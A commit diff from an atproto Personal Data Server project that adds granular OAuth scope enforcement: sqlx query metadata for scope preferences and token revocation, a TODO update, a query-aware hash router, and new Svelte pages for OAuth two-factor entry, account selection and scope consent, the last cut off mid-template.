Our Personal Data Server from scratch! tranquil.farm
pds rust database fun oauth atproto
237
fork

Configure Feed

Select the types of activity you want to include in your feed.

OAuth scopes full impl.

+9826 -2829
+17
.sqlx/query-0dfe6b602497942ce871d9b54f4d34ae9e846f3bb9f8693ecd6d90463e83d114.json
··· 1 + { 2 + "db_name": "PostgreSQL", 3 + "query": "\n INSERT INTO oauth_scope_preference (did, client_id, scope, granted, created_at, updated_at)\n VALUES ($1, $2, $3, $4, NOW(), NOW())\n ON CONFLICT (did, client_id, scope) DO UPDATE SET granted = $4, updated_at = NOW()\n ", 4 + "describe": { 5 + "columns": [], 6 + "parameters": { 7 + "Left": [ 8 + "Text", 9 + "Text", 10 + "Text", 11 + "Bool" 12 + ] 13 + }, 14 + "nullable": [] 15 + }, 16 + "hash": "0dfe6b602497942ce871d9b54f4d34ae9e846f3bb9f8693ecd6d90463e83d114" 17 + }
+29
.sqlx/query-10429e16b7a6bb2d97728526d921027c873c8c2d31e695a14241220c1339937f.json
··· 1 + { 2 + "db_name": "PostgreSQL", 3 + "query": "\n SELECT scope, granted FROM oauth_scope_preference\n WHERE did = $1 AND client_id = $2\n ", 4 + "describe": { 5 + "columns": [ 6 + { 7 + "ordinal": 0, 8 + "name": "scope", 9 + "type_info": "Text" 10 + }, 11 + { 12 + "ordinal": 1, 13 + "name": "granted", 14 + "type_info": "Bool" 15 + } 16 + ], 17 + "parameters": { 18 + "Left": [ 19 + "Text", 20 + "Text" 21 + ] 22 + }, 23 + "nullable": [ 24 + false, 25 + false 26 + ] 27 + }, 28 + "hash": "10429e16b7a6bb2d97728526d921027c873c8c2d31e695a14241220c1339937f" 29 + }
+22
.sqlx/query-1407d741caf7e074347e6cfdff07b3f72f02571976d875d5c75542c69f0fcdfe.json
··· 1 + { 2 + "db_name": "PostgreSQL", 3 + "query": "SELECT r.repo_root_cid FROM repos r JOIN users u ON r.user_id = u.id WHERE u.did = $1", 4 + "describe": { 5 + "columns": [ 6 + { 7 + "ordinal": 0, 8 + "name": "repo_root_cid", 9 + "type_info": "Text" 10 + } 11 + ], 12 + "parameters": { 13 + "Left": [ 14 + "Text" 15 + ] 16 + }, 17 + "nullable": [ 18 + false 19 + ] 20 + }, 21 + "hash": "1407d741caf7e074347e6cfdff07b3f72f02571976d875d5c75542c69f0fcdfe" 22 + }
+29
.sqlx/query-15144f5e5d9853126a59f36b2cbd1f8eea4fe719c6cba9406a9843bea2f8dc9e.json
··· 1 + { 2 + "db_name": "PostgreSQL", 3 + "query": "\n INSERT INTO repo_seq (did, event_type, commit_cid, prev_cid, ops, blobs, blocks_cids, prev_data_cid)\n VALUES ($1, $2, $3, $4, $5, $6, $7, $8)\n RETURNING seq\n ", 4 + "describe": { 5 + "columns": [ 6 + { 7 + "ordinal": 0, 8 + "name": "seq", 9 + "type_info": "Int8" 10 + } 11 + ], 12 + "parameters": { 13 + "Left": [ 14 + "Text", 15 + "Text", 16 + "Text", 17 + "Text", 18 + "Jsonb", 19 + "TextArray", 20 + "TextArray", 21 + "Text" 22 + ] 23 + }, 24 + "nullable": [ 25 + false 26 + ] 27 + }, 28 + "hash": "15144f5e5d9853126a59f36b2cbd1f8eea4fe719c6cba9406a9843bea2f8dc9e" 29 + }
+26
.sqlx/query-53b0ea60a759f8bb37d01461fd0769dcc683e796287e41d5180340296286fcbe.json
··· 1 + { 2 + "db_name": "PostgreSQL", 3 + "query": "\n INSERT INTO repo_seq (did, event_type, commit_cid, prev_cid, ops, blobs, blocks_cids)\n VALUES ($1, 'commit', $2, $2, $3, $4, $5)\n RETURNING seq\n ", 4 + "describe": { 5 + "columns": [ 6 + { 7 + "ordinal": 0, 8 + "name": "seq", 9 + "type_info": "Int8" 10 + } 11 + ], 12 + "parameters": { 13 + "Left": [ 14 + "Text", 15 + "Text", 16 + "Jsonb", 17 + "TextArray", 18 + "TextArray" 19 + ] 20 + }, 21 + "nullable": [ 22 + false 23 + ] 24 + }, 25 + "hash": "53b0ea60a759f8bb37d01461fd0769dcc683e796287e41d5180340296286fcbe" 26 + }
+15
.sqlx/query-833816de8586d7a886a14698a734c0dad7952676303749d140294c46b9536b91.json
··· 1 + { 2 + "db_name": "PostgreSQL", 3 + "query": "\n UPDATE oauth_authorization_request\n SET parameters = jsonb_set(parameters, '{scope}', to_jsonb($2::text))\n WHERE id = $1\n ", 4 + "describe": { 5 + "columns": [], 6 + "parameters": { 7 + "Left": [ 8 + "Text", 9 + "Text" 10 + ] 11 + }, 12 + "nullable": [] 13 + }, 14 + "hash": "833816de8586d7a886a14698a734c0dad7952676303749d140294c46b9536b91" 15 + }
+15
.sqlx/query-859a028033a1c7f66fd16843a357aa9f67b3fec5dac616edef36fbeb143d76f0.json
··· 1 + { 2 + "db_name": "PostgreSQL", 3 + "query": "\n DELETE FROM oauth_scope_preference\n WHERE did = $1 AND client_id = $2\n ", 4 + "describe": { 5 + "columns": [], 6 + "parameters": { 7 + "Left": [ 8 + "Text", 9 + "Text" 10 + ] 11 + }, 12 + "nullable": [] 13 + }, 14 + "hash": "859a028033a1c7f66fd16843a357aa9f67b3fec5dac616edef36fbeb143d76f0" 15 + }
-34
.sqlx/query-94966f20b7b0adb02e8c83a693a4dcc7f54b72983ba8ebd66fd805851db5c06c.json
··· 1 - { 2 - "db_name": "PostgreSQL", 3 - "query": "SELECT preferred_comms_channel as \"channel: CommsChannel\" FROM users WHERE did = $1", 4 - "describe": { 5 - "columns": [ 6 - { 7 - "ordinal": 0, 8 - "name": "channel: CommsChannel", 9 - "type_info": { 10 - "Custom": { 11 - "name": "comms_channel", 12 - "kind": { 13 - "Enum": [ 14 - "email", 15 - "discord", 16 - "telegram", 17 - "signal" 18 - ] 19 - } 20 - } 21 - } 22 - } 23 - ], 24 - "parameters": { 25 - "Left": [ 26 - "Text" 27 - ] 28 - }, 29 - "nullable": [ 30 - false 31 - ] 32 - }, 33 - "hash": "94966f20b7b0adb02e8c83a693a4dcc7f54b72983ba8ebd66fd805851db5c06c" 34 - }
+16
.sqlx/query-a4e657ed91c9ecfcf419deeae5f42ede88cddc842bdf37f2ef082b252ab1642c.json
··· 1 + { 2 + "db_name": "PostgreSQL", 3 + "query": "\n UPDATE oauth_authorization_request\n SET did = $2, device_id = $3\n WHERE id = $1\n ", 4 + "describe": { 5 + "columns": [], 6 + "parameters": { 7 + "Left": [ 8 + "Text", 9 + "Text", 10 + "Text" 11 + ] 12 + }, 13 + "nullable": [] 14 + }, 15 + "hash": "a4e657ed91c9ecfcf419deeae5f42ede88cddc842bdf37f2ef082b252ab1642c" 16 + }
+22
.sqlx/query-bcee8331c85a558fa1e9177759f23cc69b40bf8d2fc1cb0d1d4cf2499a753e5b.json
··· 1 + { 2 + "db_name": "PostgreSQL", 3 + "query": "SELECT deactivated_at IS NULL FROM users WHERE id = $1", 4 + "describe": { 5 + "columns": [ 6 + { 7 + "ordinal": 0, 8 + "name": "?column?", 9 + "type_info": "Bool" 10 + } 11 + ], 12 + "parameters": { 13 + "Left": [ 14 + "Uuid" 15 + ] 16 + }, 17 + "nullable": [ 18 + null 19 + ] 20 + }, 21 + "hash": "bcee8331c85a558fa1e9177759f23cc69b40bf8d2fc1cb0d1d4cf2499a753e5b" 22 + }
+9 -3
.sqlx/query-c47715c259bb7b56b576d9719f8facb87a9e9b6b530ca6f81ce308a4c584c002.json .sqlx/query-2b6987e2a4139bfbd262682a309ebabde5e48a5cabe08a5a2135e8856efd844d.json
··· 1 1 { 2 2 "db_name": "PostgreSQL", 3 - "query": "SELECT id, deactivated_at, takedown_ref FROM users WHERE did = $1", 3 + "query": "SELECT id, handle, deactivated_at, takedown_ref FROM users WHERE did = $1", 4 4 "describe": { 5 5 "columns": [ 6 6 { ··· 10 10 }, 11 11 { 12 12 "ordinal": 1, 13 + "name": "handle", 14 + "type_info": "Text" 15 + }, 16 + { 17 + "ordinal": 2, 13 18 "name": "deactivated_at", 14 19 "type_info": "Timestamptz" 15 20 }, 16 21 { 17 - "ordinal": 2, 22 + "ordinal": 3, 18 23 "name": "takedown_ref", 19 24 "type_info": "Text" 20 25 } ··· 26 31 }, 27 32 "nullable": [ 28 33 false, 34 + false, 29 35 true, 30 36 true 31 37 ] 32 38 }, 33 - "hash": "c47715c259bb7b56b576d9719f8facb87a9e9b6b530ca6f81ce308a4c584c002" 39 + "hash": "2b6987e2a4139bfbd262682a309ebabde5e48a5cabe08a5a2135e8856efd844d" 34 40 }
+15
.sqlx/query-ca6196defa93057f20220f433e79e4d2cdd5d6cda0add6e5d56471cd319f92cd.json
··· 1 + { 2 + "db_name": "PostgreSQL", 3 + "query": "DELETE FROM oauth_token WHERE did = $1 AND client_id = $2", 4 + "describe": { 5 + "columns": [], 6 + "parameters": { 7 + "Left": [ 8 + "Text", 9 + "Text" 10 + ] 11 + }, 12 + "nullable": [] 13 + }, 14 + "hash": "ca6196defa93057f20220f433e79e4d2cdd5d6cda0add6e5d56471cd319f92cd" 15 + }
-29
.sqlx/query-d7d7e002dcdc663811303411c1200ef4509aef9416a177dc6888a8e2648b173f.json
··· 1 - { 2 - "db_name": "PostgreSQL", 3 - "query": "\n INSERT INTO repo_seq (did, event_type, commit_cid, prev_cid, ops, blobs, blocks_cids, prev_data_cid)\n VALUES ($1, $2, $3, $4, $5, $6, $7, $8)\n RETURNING seq\n ", 4 - "describe": { 5 - "columns": [ 6 - { 7 - "ordinal": 0, 8 - "name": "seq", 9 - "type_info": "Int8" 10 - } 11 - ], 12 - "parameters": { 13 - "Left": [ 14 - "Text", 15 - "Text", 16 - "Text", 17 - "Text", 18 - "Jsonb", 19 - "TextArray", 20 - "TextArray", 21 - "Text" 22 - ] 23 - }, 24 - "nullable": [ 25 - false 26 - ] 27 - }, 28 - "hash": "d7d7e002dcdc663811303411c1200ef4509aef9416a177dc6888a8e2648b173f" 29 - }
-22
.sqlx/query-ed34111a7f41b419a23d16ddd23cbc6aff9ab373946ff243512c52f857b7980d.json
··· 1 - { 2 - "db_name": "PostgreSQL", 3 - "query": "SELECT 1 as one FROM users WHERE handle = $1", 4 - "describe": { 5 - "columns": [ 6 - { 7 - "ordinal": 0, 8 - "name": "one", 9 - "type_info": "Int4" 10 - } 11 - ], 12 - "parameters": { 13 - "Left": [ 14 - "Text" 15 - ] 16 - }, 17 - "nullable": [ 18 - null 19 - ] 20 - }, 21 - "hash": "ed34111a7f41b419a23d16ddd23cbc6aff9ab373946ff243512c52f857b7980d" 22 - }
+1
Cargo.lock
··· 6207 6207 "serde_bytes", 6208 6208 "serde_ipld_dagcbor", 6209 6209 "serde_json", 6210 + "serde_urlencoded", 6210 6211 "sha2", 6211 6212 "sqlx", 6212 6213 "subtle",
+1
Cargo.toml
··· 34 34 serde_ipld_dagcbor = "0.6.4" 35 35 ipld-core = "0.4.2" 36 36 serde_json = "1.0.145" 37 + serde_urlencoded = "0.7" 37 38 sha2 = "0.10.9" 38 39 subtle = "2.5" 39 40 p256 = { version = "0.13", features = ["ecdsa"] }
+3 -13
TODO.md
··· 2 2 3 3 ## Active development 4 4 5 - ### OAuth scope authorization UI 6 - Display and manage OAuth scopes during authorization flows. 7 - 8 - - [ ] Parse and display requested scopes from authorization request 9 - - [ ] Human-readable scope descriptions (e.g., "Read your posts" not "app.bsky.feed.read") 10 - - [ ] Group scopes by category (read, write, admin, etc.) 11 - - [ ] Allow users to uncheck optional scopes before authorizing 12 - - [ ] Distinguish required vs optional scopes in UI 13 - - [ ] Remember scope preferences per client (don't ask again for same scopes) 14 - - [ ] Token endpoint respects user's scope selections 15 - - [ ] Protected endpoints check token scopes before allowing operations 16 - 17 5 ### Frontend 18 6 So like... make the thing unique, make it cool. 19 7 ··· 90 78 91 79 OAuth 2.1: Authorization server metadata, JWKS, PAR, authorize endpoint with login UI, token endpoint (auth code + refresh), revocation, introspection, DPoP, PKCE S256, client metadata validation, private_key_jwt verification. 92 80 81 + OAuth Scope Enforcement: Full granular scope system with consent UI, human-readable scope descriptions, per-client scope preferences, scope parsing (repo/blob/rpc/account/identity), endpoint-level scope checks, DPoP token support in auth extractors, token revocation on re-authorization, response_mode support (query/fragment). 82 + 93 83 App endpoints: getPreferences, putPreferences, getProfile, getProfiles, getTimeline, getAuthorFeed, getActorLikes, getPostThread, getFeed, registerPush (all with local-first + proxy fallback). 94 84 95 85 Infrastructure: Sequencer with cursor replay, postgres repo storage with atomic transactions, valkey DID cache, debounced crawler notifications with circuit breakers, multi-channel notifications (email/Discord/Telegram/Signal), image processing, distributed rate limiting, security hardening. 96 86 97 - Web UI: OAuth login, registration, email verification, password reset, multi-account selector, dashboard, sessions, app passwords, invites, notification preferences, repo browser, CAR export, admin panel. 87 + Web UI: OAuth login, registration, email verification, password reset, multi-account selector, dashboard, sessions, app passwords, invites, notification preferences, repo browser, CAR export, admin panel, OAuth consent screen with scope selection. 98 88 99 89 Auth: ES256K + HS256 dual support, JTI-only token storage, refresh token family tracking, encrypted signing keys (AES-256-GCM), DPoP replay protection, constant-time comparisons.
+15
frontend/src/App.svelte
··· 13 13 import Notifications from './routes/Notifications.svelte' 14 14 import RepoExplorer from './routes/RepoExplorer.svelte' 15 15 import Admin from './routes/Admin.svelte' 16 + import OAuthConsent from './routes/OAuthConsent.svelte' 17 + import OAuthLogin from './routes/OAuthLogin.svelte' 18 + import OAuthAccounts from './routes/OAuthAccounts.svelte' 19 + import OAuth2FA from './routes/OAuth2FA.svelte' 20 + import OAuthError from './routes/OAuthError.svelte' 16 21 17 22 const auth = getAuthState() 18 23 ··· 46 51 return RepoExplorer 47 52 case '/admin': 48 53 return Admin 54 + case '/oauth/consent': 55 + return OAuthConsent 56 + case '/oauth/login': 57 + return OAuthLogin 58 + case '/oauth/accounts': 59 + return OAuthAccounts 60 + case '/oauth/2fa': 61 + return OAuth2FA 62 + case '/oauth/error': 63 + return OAuthError 49 64 default: 50 65 return auth.session ? Dashboard : Login 51 66 }
+7 -2
frontend/src/lib/router.svelte.ts
··· 1 - let currentPath = $state(window.location.hash.slice(1) || '/') 1 + let currentPath = $state(getPathWithoutQuery(window.location.hash.slice(1) || '/')) 2 + 3 + function getPathWithoutQuery(hash: string): string { 4 + const queryIndex = hash.indexOf('?') 5 + return queryIndex === -1 ? hash : hash.slice(0, queryIndex) 6 + } 2 7 3 8 window.addEventListener('hashchange', () => { 4 - currentPath = window.location.hash.slice(1) || '/' 9 + currentPath = getPathWithoutQuery(window.location.hash.slice(1) || '/') 5 10 }) 6 11 7 12 export function navigate(path: string) {
+213
frontend/src/routes/OAuth2FA.svelte
··· 1 + <script lang="ts"> 2 + import { navigate } from '../lib/router.svelte' 3 + 4 + let code = $state('') 5 + let submitting = $state(false) 6 + let error = $state<string | null>(null) 7 + 8 + function getRequestUri(): string | null { 9 + const params = new URLSearchParams(window.location.hash.split('?')[1] || '') 10 + return params.get('request_uri') 11 + } 12 + 13 + function getChannel(): string { 14 + const params = new URLSearchParams(window.location.hash.split('?')[1] || '') 15 + return params.get('channel') || 'email' 16 + } 17 + 18 + async function handleSubmit(e: Event) { 19 + e.preventDefault() 20 + const requestUri = getRequestUri() 21 + if (!requestUri) { 22 + error = 'Missing request_uri parameter' 23 + return 24 + } 25 + 26 + submitting = true 27 + error = null 28 + 29 + try { 30 + const response = await fetch('/oauth/authorize/2fa', { 31 + method: 'POST', 32 + headers: { 33 + 'Content-Type': 'application/json', 34 + 'Accept': 'application/json' 35 + }, 36 + body: JSON.stringify({ 37 + request_uri: requestUri, 38 + code: code.trim() 39 + }) 40 + }) 41 + 42 + const data = await response.json() 43 + 44 + if (!response.ok) { 45 + error = data.error_description || data.error || 'Verification failed' 46 + submitting = false 47 + return 48 + } 49 + 50 + if (data.redirect_uri) { 51 + window.location.href = data.redirect_uri 52 + return 53 + } 54 + 55 + error = 'Unexpected response from server' 56 + submitting = false 57 + } catch { 58 + error = 'Failed to connect to server' 59 + submitting = false 60 + } 61 + } 62 + 63 + function handleCancel() { 64 + const requestUri = getRequestUri() 65 + if (requestUri) { 66 + navigate(`/oauth/login?request_uri=${encodeURIComponent(requestUri)}`) 67 + } else { 68 + window.history.back() 69 + } 70 + } 71 + 72 + let channel = $derived(getChannel()) 73 + </script> 74 + 75 + <div class="oauth-2fa-container"> 76 + <h1>Two-Factor Authentication</h1> 77 + <p class="subtitle"> 78 + A verification code has been sent to your {channel}. 79 + Enter the code below to continue. 80 + </p> 81 + 82 + {#if error} 83 + <div class="error">{error}</div> 84 + {/if} 85 + 86 + <form onsubmit={handleSubmit}> 87 + <div class="field"> 88 + <label for="code">Verification Code</label> 89 + <input 90 + id="code" 91 + type="text" 92 + bind:value={code} 93 + placeholder="Enter 6-digit code" 94 + disabled={submitting} 95 + required 96 + maxlength="6" 97 + pattern="[0-9]{6}" 98 + autocomplete="one-time-code" 99 + inputmode="numeric" 100 + /> 101 + </div> 102 + 103 + <div class="actions"> 104 + <button type="button" class="cancel-btn" onclick={handleCancel} disabled={submitting}> 105 + Cancel 106 + </button> 107 + <button type="submit" class="submit-btn" disabled={submitting || code.trim().length !== 6}> 108 + {submitting ? 'Verifying...' : 'Verify'} 109 + </button> 110 + </div> 111 + </form> 112 + </div> 113 + 114 + <style> 115 + .oauth-2fa-container { 116 + max-width: 400px; 117 + margin: 4rem auto; 118 + padding: 2rem; 119 + } 120 + 121 + h1 { 122 + margin: 0 0 0.5rem 0; 123 + } 124 + 125 + .subtitle { 126 + color: var(--text-secondary); 127 + margin: 0 0 2rem 0; 128 + } 129 + 130 + form { 131 + display: flex; 132 + flex-direction: column; 133 + gap: 1rem; 134 + } 135 + 136 + .field { 137 + display: flex; 138 + flex-direction: column; 139 + gap: 0.25rem; 140 + } 141 + 142 + label { 143 + font-size: 0.875rem; 144 + font-weight: 500; 145 + } 146 + 147 + input { 148 + padding: 0.75rem; 149 + border: 1px solid var(--border-color-light); 150 + border-radius: 4px; 151 + font-size: 1.5rem; 152 + letter-spacing: 0.5em; 153 + text-align: center; 154 + background: var(--bg-input); 155 + color: var(--text-primary); 156 + } 157 + 158 + input:focus { 159 + outline: none; 160 + border-color: var(--accent); 161 + } 162 + 163 + .error { 164 + padding: 0.75rem; 165 + background: var(--error-bg); 166 + border: 1px solid var(--error-border); 167 + border-radius: 4px; 168 + color: var(--error-text); 169 + margin-bottom: 1rem; 170 + } 171 + 172 + .actions { 173 + display: flex; 174 + gap: 1rem; 175 + margin-top: 0.5rem; 176 + } 177 + 178 + .actions button { 179 + flex: 1; 180 + padding: 0.75rem; 181 + border: none; 182 + border-radius: 4px; 183 + font-size: 1rem; 184 + cursor: pointer; 185 + transition: background-color 0.15s; 186 + } 187 + 188 + .actions button:disabled { 189 + opacity: 0.6; 190 + cursor: not-allowed; 191 + } 192 + 193 + .cancel-btn { 194 + background: var(--bg-secondary); 195 + color: var(--text-primary); 196 + border: 1px solid var(--border-color); 197 + } 198 + 199 + .cancel-btn:hover:not(:disabled) { 200 + background: var(--error-bg); 201 + border-color: var(--error-border); 202 + color: var(--error-text); 203 + } 204 + 205 + .submit-btn { 206 + background: var(--accent); 207 + color: white; 208 + } 209 + 210 + .submit-btn:hover:not(:disabled) { 211 + background: var(--accent-hover); 212 + } 213 + </style>
+264
frontend/src/routes/OAuthAccounts.svelte
··· 1 + <script lang="ts"> 2 + import { navigate } from '../lib/router.svelte' 3 + 4 + interface AccountInfo { 5 + did: string 6 + handle: string 7 + email: string 8 + } 9 + 10 + let loading = $state(true) 11 + let error = $state<string | null>(null) 12 + let submitting = $state(false) 13 + let accounts = $state<AccountInfo[]>([]) 14 + 15 + function getRequestUri(): string | null { 16 + const params = new URLSearchParams(window.location.hash.split('?')[1] || '') 17 + return params.get('request_uri') 18 + } 19 + 20 + async function fetchAccounts() { 21 + const requestUri = getRequestUri() 22 + if (!requestUri) { 23 + error = 'Missing request_uri parameter' 24 + loading = false 25 + return 26 + } 27 + 28 + try { 29 + const response = await fetch(`/oauth/authorize/accounts?request_uri=${encodeURIComponent(requestUri)}`) 30 + if (!response.ok) { 31 + const data = await response.json() 32 + error = data.error_description || data.error || 'Failed to load accounts' 33 + loading = false 34 + return 35 + } 36 + const data = await response.json() 37 + accounts = data.accounts || [] 38 + } catch { 39 + error = 'Failed to connect to server' 40 + } finally { 41 + loading = false 42 + } 43 + } 44 + 45 + async function handleSelectAccount(did: string) { 46 + const requestUri = getRequestUri() 47 + if (!requestUri) { 48 + error = 'Missing request_uri parameter' 49 + return 50 + } 51 + 52 + submitting = true 53 + error = null 54 + 55 + try { 56 + const response = await fetch('/oauth/authorize/select', { 57 + method: 'POST', 58 + headers: { 59 + 'Content-Type': 'application/json', 60 + 'Accept': 'application/json' 61 + }, 62 + body: JSON.stringify({ 63 + request_uri: requestUri, 64 + did 65 + }) 66 + }) 67 + 68 + const data = await response.json() 69 + 70 + if (!response.ok) { 71 + error = data.error_description || data.error || 'Selection failed' 72 + submitting = false 73 + return 74 + } 75 + 76 + if (data.needs_2fa) { 77 + navigate(`/oauth/2fa?request_uri=${encodeURIComponent(requestUri)}&channel=${encodeURIComponent(data.channel || '')}`) 78 + return 79 + } 80 + 81 + if (data.redirect_uri) { 82 + window.location.href = data.redirect_uri 83 + return 84 + } 85 + 86 + error = 'Unexpected response from server' 87 + submitting = false 88 + } catch { 89 + error = 'Failed to connect to server' 90 + submitting = false 91 + } 92 + } 93 + 94 + function handleDifferentAccount() { 95 + const requestUri = getRequestUri() 96 + if (requestUri) { 97 + navigate(`/oauth/login?request_uri=${encodeURIComponent(requestUri)}`) 98 + } else { 99 + navigate('/oauth/login') 100 + } 101 + } 102 + 103 + $effect(() => { 104 + fetchAccounts() 105 + }) 106 + </script> 107 + 108 + <div class="oauth-accounts-container"> 109 + {#if loading} 110 + <div class="loading"> 111 + <p>Loading accounts...</p> 112 + </div> 113 + {:else if error} 114 + <div class="error-container"> 115 + <h1>Error</h1> 116 + <div class="error">{error}</div> 117 + <button type="button" onclick={handleDifferentAccount}> 118 + Sign in with different account 119 + </button> 120 + </div> 121 + {:else} 122 + <h1>Choose an Account</h1> 123 + <p class="subtitle">Select an account to continue</p> 124 + 125 + <div class="accounts-list"> 126 + {#each accounts as account} 127 + <button 128 + type="button" 129 + class="account-item" 130 + class:disabled={submitting} 131 + onclick={() => !submitting && handleSelectAccount(account.did)} 132 + > 133 + <div class="account-info"> 134 + <span class="account-handle">@{account.handle}</span> 135 + <span class="account-email">{account.email}</span> 136 + </div> 137 + </button> 138 + {/each} 139 + </div> 140 + 141 + <button type="button" class="secondary different-account" onclick={handleDifferentAccount}> 142 + Sign in to different account 143 + </button> 144 + {/if} 145 + </div> 146 + 147 + <style> 148 + .oauth-accounts-container { 149 + max-width: 400px; 150 + margin: 4rem auto; 151 + padding: 2rem; 152 + } 153 + 154 + h1 { 155 + margin: 0 0 0.5rem 0; 156 + } 157 + 158 + .subtitle { 159 + color: var(--text-secondary); 160 + margin: 0 0 2rem 0; 161 + } 162 + 163 + .loading { 164 + display: flex; 165 + align-items: center; 166 + justify-content: center; 167 + min-height: 200px; 168 + color: var(--text-secondary); 169 + } 170 + 171 + .error-container { 172 + text-align: center; 173 + } 174 + 175 + .error { 176 + padding: 0.75rem; 177 + background: var(--error-bg); 178 + border: 1px solid var(--error-border); 179 + border-radius: 4px; 180 + color: var(--error-text); 181 + margin-bottom: 1rem; 182 + } 183 + 184 + .accounts-list { 185 + display: flex; 186 + flex-direction: column; 187 + gap: 0.5rem; 188 + margin-bottom: 1rem; 189 + } 190 + 191 + .account-item { 192 + display: flex; 193 + align-items: center; 194 + padding: 1rem; 195 + background: var(--bg-card); 196 + border: 1px solid var(--border-color); 197 + border-radius: 8px; 198 + cursor: pointer; 199 + text-align: left; 200 + width: 100%; 201 + transition: border-color 0.15s, box-shadow 0.15s; 202 + } 203 + 204 + .account-item:hover:not(.disabled) { 205 + border-color: var(--accent); 206 + box-shadow: 0 2px 8px rgba(77, 166, 255, 0.15); 207 + } 208 + 209 + .account-item.disabled { 210 + opacity: 0.6; 211 + cursor: not-allowed; 212 + } 213 + 214 + .account-info { 215 + display: flex; 216 + flex-direction: column; 217 + gap: 0.25rem; 218 + } 219 + 220 + .account-handle { 221 + font-weight: 500; 222 + color: var(--text-primary); 223 + } 224 + 225 + .account-email { 226 + font-size: 0.875rem; 227 + color: var(--text-secondary); 228 + } 229 + 230 + button { 231 + padding: 0.75rem; 232 + background: var(--accent); 233 + color: white; 234 + border: none; 235 + border-radius: 4px; 236 + font-size: 1rem; 237 + cursor: pointer; 238 + } 239 + 240 + button:hover:not(:disabled) { 241 + background: var(--accent-hover); 242 + } 243 + 244 + button:disabled { 245 + opacity: 0.6; 246 + cursor: not-allowed; 247 + } 248 + 249 + button.secondary { 250 + background: transparent; 251 + color: var(--accent); 252 + border: 1px solid var(--accent); 253 + width: 100%; 254 + } 255 + 256 + button.secondary:hover:not(:disabled) { 257 + background: var(--accent); 258 + color: white; 259 + } 260 + 261 + .different-account { 262 + margin-top: 1rem; 263 + } 264 + </style>
+451
frontend/src/routes/OAuthConsent.svelte
··· 1 + <script lang="ts"> 2 + import { navigate } from '../lib/router.svelte' 3 + 4 + interface ScopeInfo { 5 + scope: string 6 + category: string 7 + required: boolean 8 + description: string 9 + display_name: string 10 + granted: boolean | null 11 + } 12 + 13 + interface ConsentData { 14 + request_uri: string 15 + client_id: string 16 + client_name: string | null 17 + client_uri: string | null 18 + logo_uri: string | null 19 + scopes: ScopeInfo[] 20 + show_consent: boolean 21 + did: string 22 + } 23 + 24 + let loading = $state(true) 25 + let error = $state<string | null>(null) 26 + let submitting = $state(false) 27 + let consentData = $state<ConsentData | null>(null) 28 + let scopeSelections = $state<Record<string, boolean>>({}) 29 + let rememberChoice = $state(false) 30 + 31 + function getRequestUri(): string | null { 32 + const params = new URLSearchParams(window.location.hash.split('?')[1] || '') 33 + return params.get('request_uri') 34 + } 35 + 36 + async function fetchConsentData() { 37 + const requestUri = getRequestUri() 38 + if (!requestUri) { 39 + error = 'Missing request_uri parameter' 40 + loading = false 41 + return 42 + } 43 + 44 + try { 45 + const response = await fetch(`/oauth/authorize/consent?request_uri=${encodeURIComponent(requestUri)}`) 46 + if (!response.ok) { 47 + const data = await response.json() 48 + error = data.error_description || data.error || 'Failed to load consent data' 49 + loading = false 50 + return 51 + } 52 + const data: ConsentData = await response.json() 53 + consentData = data 54 + 55 + for (const scope of data.scopes) { 56 + if (scope.required) { 57 + scopeSelections[scope.scope] = true 58 + } else if (scope.granted !== null) { 59 + scopeSelections[scope.scope] = scope.granted 60 + } else { 61 + scopeSelections[scope.scope] = true 62 + } 63 + } 64 + 65 + if (!data.show_consent) { 66 + await submitConsent() 67 + } 68 + } catch { 69 + error = 'Failed to connect to server' 70 + } finally { 71 + loading = false 72 + } 73 + } 74 + 75 + async function submitConsent() { 76 + if (!consentData) return 77 + 78 + submitting = true 79 + const approvedScopes = Object.entries(scopeSelections) 80 + .filter(([_, approved]) => approved) 81 + .map(([scope]) => scope) 82 + 83 + try { 84 + const response = await fetch('/oauth/authorize/consent', { 85 + method: 'POST', 86 + headers: { 'Content-Type': 'application/json' }, 87 + body: JSON.stringify({ 88 + request_uri: consentData.request_uri, 89 + approved_scopes: approvedScopes, 90 + remember: rememberChoice 91 + }) 92 + }) 93 + 94 + if (!response.ok) { 95 + const data = await response.json() 96 + error = data.error_description || data.error || 'Authorization failed' 97 + submitting = false 98 + return 99 + } 100 + 101 + const data = await response.json() 102 + if (data.redirect_uri) { 103 + window.location.href = data.redirect_uri 104 + } 105 + } catch { 106 + error = 'Failed to complete authorization' 107 + submitting = false 108 + } 109 + } 110 + 111 + async function handleDeny() { 112 + if (!consentData) return 113 + 114 + submitting = true 115 + try { 116 + const response = await fetch('/oauth/authorize/deny', { 117 + method: 'POST', 118 + headers: { 'Content-Type': 'application/x-www-form-urlencoded' }, 119 + body: `request_uri=${encodeURIComponent(consentData.request_uri)}` 120 + }) 121 + 122 + if (response.redirected) { 123 + window.location.href = response.url 124 + } 125 + } catch { 126 + error = 'Failed to deny authorization' 127 + submitting = false 128 + } 129 + } 130 + 131 + function handleScopeToggle(scope: string) { 132 + const scopeInfo = consentData?.scopes.find(s => s.scope === scope) 133 + if (scopeInfo?.required) return 134 + scopeSelections[scope] = !scopeSelections[scope] 135 + } 136 + 137 + function groupScopesByCategory(scopes: ScopeInfo[]): Record<string, ScopeInfo[]> { 138 + const groups: Record<string, ScopeInfo[]> = {} 139 + for (const scope of scopes) { 140 + if (!groups[scope.category]) { 141 + groups[scope.category] = [] 142 + } 143 + groups[scope.category].push(scope) 144 + } 145 + return groups 146 + } 147 + 148 + $effect(() => { 149 + fetchConsentData() 150 + }) 151 + 152 + let scopeGroups = $derived(consentData ? groupScopesByCategory(consentData.scopes) : {}) 153 + </script> 154 + 155 + <div class="consent-container"> 156 + {#if loading} 157 + <div class="loading"> 158 + <p>Loading...</p> 159 + </div> 160 + {:else if error} 161 + <div class="error-container"> 162 + <h1>Authorization Error</h1> 163 + <div class="error">{error}</div> 164 + <button type="button" onclick={() => navigate('/login')}> 165 + Return to Login 166 + </button> 167 + </div> 168 + {:else if consentData} 169 + <div class="client-info"> 170 + {#if consentData.logo_uri} 171 + <img src={consentData.logo_uri} alt="" class="client-logo" /> 172 + {/if} 173 + <h1>{consentData.client_name || 'Application'}</h1> 174 + <p class="subtitle">wants to access your account</p> 175 + {#if consentData.client_uri} 176 + <a href={consentData.client_uri} target="_blank" rel="noopener noreferrer" class="client-link"> 177 + {consentData.client_uri} 178 + </a> 179 + {/if} 180 + </div> 181 + 182 + <div class="account-info"> 183 + <span class="label">Signing in as:</span> 184 + <span class="did">{consentData.did}</span> 185 + </div> 186 + 187 + <div class="scopes-section"> 188 + <h2>Permissions Requested</h2> 189 + {#each Object.entries(scopeGroups) as [category, 